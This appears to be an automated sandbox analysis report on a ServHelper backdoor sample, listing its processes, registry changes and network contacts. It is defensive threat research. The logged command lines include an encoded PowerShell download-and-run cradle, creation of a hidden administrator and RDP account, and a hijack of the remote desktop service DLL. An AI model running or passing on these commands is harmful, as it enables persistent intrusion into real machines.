Malware Analysis Report

2024-10-23 17:53

Sample ID 210721-181y71wc52
Target ViJoy.bin
SHA256 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
Tags
servhelper backdoor bootkit discovery exploit persistence trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08

Threat Level: Known bad

The file ViJoy.bin was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor bootkit discovery exploit persistence trojan upx

ServHelper

Grants admin privileges

Possible privilege escalation attempt

Executes dropped EXE

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Modifies file permissions

Writes to the Master Boot Record (MBR)

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Script User-Agent

Modifies registry key

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Runs net.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-21 08:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-21 08:36

Reported

2021-07-21 08:39

Platform

win7v20210408

Max time kernel

135s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

Signatures

ServHelper

trojan backdoor servhelper

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_425142e1-ff03-49e3-8c93-1c568bbed4c1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f0a89b75-84c4-46ec-8801-e598bbb7385f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f2680bf9-28e9-43e0-bd25-d5f6b7de7a4a C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0a9042e3-638b-4e58-b33a-596aaa9c2157 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9dd782a2-26fd-4b13-9482-96d6587e7e33 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b45ab286-01c7-430a-9385-2136afd79a6d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4032a6d-88a9-474f-9976-9b79ad6b05ef C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_28ba8299-4f98-4df6-a877-32c290c82849 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_499386d8-9573-4adc-b439-294e8eece9ea C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XEZ6J1XERCPNDTVB1U7P.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_09f03cb1-a0bf-4087-8e2c-ef7993cfca7d C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b104d4dc-9fc7-4b5d-ad8f-ac019f392154 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0d795e91c7ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 520 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1792 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Roaming\Templers\exe2.exe C:\Users\Public\Documents\Wondershare\NFWCHK.exe
PID 1440 wrote to memory of 324 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 324 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1440 wrote to memory of 324 N/A C:\Users\Admin\AppData\Roaming\Templers\exe1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 324 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 324 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1276 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1276 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1276 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 324 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 324 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 324 wrote to memory of 1168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 324 wrote to memory of 860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 860 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1124 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 856 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1584 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1520 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1488 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 324 wrote to memory of 936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe

"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe

"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Users\Public\Documents\Wondershare\NFWCHK.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\onrvk3o1\onrvk3o1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp" "c:\Users\Admin\AppData\Local\Temp\onrvk3o1\CSC85EF2F55F5C9461DAB91D8D18757A.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc eZHAecbZ /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc eZHAecbZ /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc eZHAecbZ /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc eZHAecbZ

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc eZHAecbZ

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc eZHAecbZ

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 platform.wondershare.com udp
N/A 47.91.67.36:80 platform.wondershare.com tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.109.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

memory/520-59-0x0000000000A60000-0x0000000000A61000-memory.dmp

memory/520-61-0x0000000000260000-0x0000000000291000-memory.dmp

